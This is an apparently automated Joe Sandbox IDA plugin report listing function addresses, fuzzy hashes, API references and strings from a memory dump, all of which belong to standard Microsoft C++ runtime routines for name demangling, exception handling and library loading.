Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 179159573-1464470183
Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction ID: 723a31083c13f433bf19b98db3c0aab2968863a39aaade657d1a71d5e50b633f
Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction Fuzzy Hash: 91517BB1F08B5299FB14EB66E8451BC37B0BB04BA8F5401B6EA0D53A68DF39E561C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4588E4 Relevance: 15.2, APIs: 10, Instructions: 150COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4589AE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4589BE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458A0A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458A1A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458A2A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458A9D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458AAE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458AC0
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458AEC
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458AFB

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction ID: 439b831f61ccae05f7a44ed936508f326a15a1e937358132dc6aa78a7b56779b
Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction Fuzzy Hash: F36162A2F04B5698FB01EBA2D8801FC37B1BB44B68F4044B6DE4D6BA69EF78D555C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4531A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A45333E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45334B

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4535F9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453644
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A453679

Strings

csm, xrefs: 00007FFE1A4532E7
csm, xrefs: 00007FFE1A453285
csm, xrefs: 00007FFE1A453367

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction ID: d4ff39ab3bb3689019bd4ef037047d19d5f0395cf0da8221d9ec773b6a6d2b04
Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction Fuzzy Hash: F9E1A3B2B08A818AE720AF36D4902BD7BA1FB44F68F1441B6DA9D47765DF38E495C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45BE24 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45BFD8

Part of subcall function 00007FFE1A458C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45913D
Part of subcall function 00007FFE1A458C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459175

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45BF8A

Strings

cli::pin_ptr<, xrefs: 00007FFE1A45BFA1
cli::array<, xrefs: 00007FFE1A45BF57
std::nullptr_t, xrefs: 00007FFE1A45BF03
std::nullptr_t , xrefs: 00007FFE1A45BF16
void , xrefs: 00007FFE1A45BE96
void, xrefs: 00007FFE1A45BE6E

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction ID: dba6580a2a57267591f59c3b4abd74c52651be419f6ee4b04271c7b9a41a2285
Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction Fuzzy Hash: 585149A2F08F4598FB51EBA2D8412BC77B0BB08B64F4441F7CA4D526A5EF7C9065CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A455F0A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4563F0: RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A456434
Part of subcall function 00007FFE1A4563F0: RaiseException.KERNEL32 ref: 00007FFE1A45647A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A455FA7
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE1A456003

Strings

Attempted a typeid of nullptr pointer!, xrefs: 00007FFE1A4560E5
Bad dynamic_cast!, xrefs: 00007FFE1A456072
Access violation - no RTTI data!, xrefs: 00007FFE1A455F0A, 00007FFE1A45612B
Bad read pointer - no RTTI data!, xrefs: 00007FFE1A456108

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction ID: bf3c5928af7a4f54e96b48b622f0f3e575d0c6bfc1b8b3c3d21e3a7c1f9013cd
Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction Fuzzy Hash: 6351BFA2B09E4692EE20EB66E4902B9A3A0FF44FA4F4444F3DA5D43675DF3CE525C301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45E148 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45E1BC
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45E1CB
DName::operator+=.LIBVCRUNTIME ref: 00007FFE1A45E2E8

Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C459
Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C492
Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45E26B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45E27B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45E325

Strings

{for , xrefs: 00007FFE1A45E1F4

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: {for
API String ID: 179159573-864106941
Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction ID: 9842e773e3412af4cf65e0198cabaf7c1106b0f0c0d1e2616a1ce861183a0ec5
Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction Fuzzy Hash: 08515BB2B08A85A9E711AF26C4413FC77A1EB44B68F4480F2EA5C47BA9DF7CD560C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4568AC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A456931
GetLastError.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A45693F
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A456958
LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A45696A
FreeLibrary.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A4569B0
GetProcAddress.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A4569BC

Strings

api-ms-, xrefs: 00007FFE1A456951

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction ID: 9efc9f075a334c014589cfccaaa18e5d51a6d937fe9a4bc18af7f42151a37550
Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction Fuzzy Hash: 9131AF61B1AF8291EE11AB07A8001B5A2A4BF48FB0F5945B7DD2D4B7A4EF3CE164C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4527CC Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452886
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4528A5
__AdjustPointer.LIBCMT ref: 00007FFE1A4528E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4528F3
__AdjustPointer.LIBCMT ref: 00007FFE1A45292F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452944
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452989
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452990

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction ID: 642b842a912d40fdf9c2c957ef8f5295bb4b61aa26bc49168820bcaec06eb6e7
Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
Instruction Fuzzy Hash: 4B5190A1F09E4382FA69AB57944427867A4AF44FB4F0985F7EA4E073A4DF3CE4618300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4525E8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4526A0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4526BE
__AdjustPointer.LIBCMT ref: 00007FFE1A4526FF
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45270C
__AdjustPointer.LIBCMT ref: 00007FFE1A452748
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45275D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4527A2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4527A9

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction ID: 6d06171c758477a8a6816760c24ef9a9f669ee0236d58f4a38a19748238d5f76
Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
Instruction Fuzzy Hash: 1A518FE2B09F4282EA65EB17954463863A4AF54FA4F0544F7EA4E077B4DF3CE861C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A455520 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A4555E9
_local_unwind.LIBVCRUNTIME ref: 00007FFE1A45568C

Strings

MOC, xrefs: 00007FFE1A455562
csm, xrefs: 00007FFE1A455584
RCC, xrefs: 00007FFE1A45556E
csm, xrefs: 00007FFE1A4556D0

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: FileHeader_local_unwind
String ID: MOC$RCC$csm$csm
API String ID: 2627209546-1441736206
Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction ID: 4bff93c56a7fd6fe365e17166ff9465f2d531dbb32de18e5b9e6cae2f04be60b
Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
Instruction Fuzzy Hash: 455180B2B09A4186EA60BF36900037966A0FF44FB4F5410F3DA4D833A5DF3CE4618A82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45D740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE1A45CE14), ref: 00007FFE1A45D803
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45D822

Strings

`template-parameter, xrefs: 00007FFE1A45D830
void, xrefs: 00007FFE1A45D786

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction ID: f85b8549f5f1985b488acaa23aca29926417e0d0263a1e5a1928cf8fb42e78bc
Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
Instruction Fuzzy Hash: 18415A62F08F4688FB04EBA6D8512FC2371BF08BA4F5401B6CE5D17A65DF38946AC340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A458624 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4586DB

Strings

,<ellipsis>, xrefs: 00007FFE1A4586B8
,..., xrefs: 00007FFE1A4586A8
void, xrefs: 00007FFE1A458759
<ellipsis>, xrefs: 00007FFE1A458734
..., xrefs: 00007FFE1A458724

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 2943138195-2211150622
Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction ID: c22a252683084e3a78dcfab078d5ef6a1db550ae4a7256e82204d7d60a5a2148
Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
Instruction Fuzzy Hash: 594136B2F08F8688FB029B26D8402BC77B0BB08B58F5441B2DA5D53364DF3CA5A5C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45A31C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A40F

Strings

unsigned , xrefs: 00007FFE1A45A3E3
long , xrefs: 00007FFE1A45A37E
int , xrefs: 00007FFE1A45A38D
short , xrefs: 00007FFE1A45A39C
char , xrefs: 00007FFE1A45A3A5

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction ID: ab7eec8e7cedd0bc971dd47ea2ea2625ab5d47f9e626b2c2f00abce42a1f2c98
Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
Instruction Fuzzy Hash: B34168B2F18B5689EB159F6AD8481BC37B1BB09B68F4481B3CA0C57B78DF389564C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4562D0 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FFE1A456326
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A456369
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE1A456393
InterlockedPushEntrySList.KERNEL32 ref: 00007FFE1A4563B0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A4563BC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A4563C5

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction ID: 48b66aaf2916ad99ba7d7c3e519d6005a89472b45c0c69aa8ded052bad530d61
Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction Fuzzy Hash: 5931C461B19F9181EB11AB27E804579A3A4FF08FE4B5945F6DE2D433A0EE3DD462C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4538A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

EncodePointer.KERNEL32 ref: 00007FFE1A453918
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A453963
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453B91

Strings

MOC, xrefs: 00007FFE1A45392C
RCC, xrefs: 00007FFE1A453934

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction ID: e6ea8166ce1a269e67d5f5a9ff2da1a762e861be9e7c81596e1e14aef120ebb0
Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction Fuzzy Hash: AA91A2B3B08B818AE710DB66E4902BD7BA0F744B98F1441A6EF8D17765DF38E1A5C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45BB70 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45BC50

Part of subcall function 00007FFE1A458C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45913D
Part of subcall function 00007FFE1A458C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459175

Strings

volatile , xrefs: 00007FFE1A45BBD3, 00007FFE1A45BD21
volatile, xrefs: 00007FFE1A45BBE2, 00007FFE1A45BD30
std::nullptr_t, xrefs: 00007FFE1A45BDF1
std::nullptr_t , xrefs: 00007FFE1A45BDC5

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

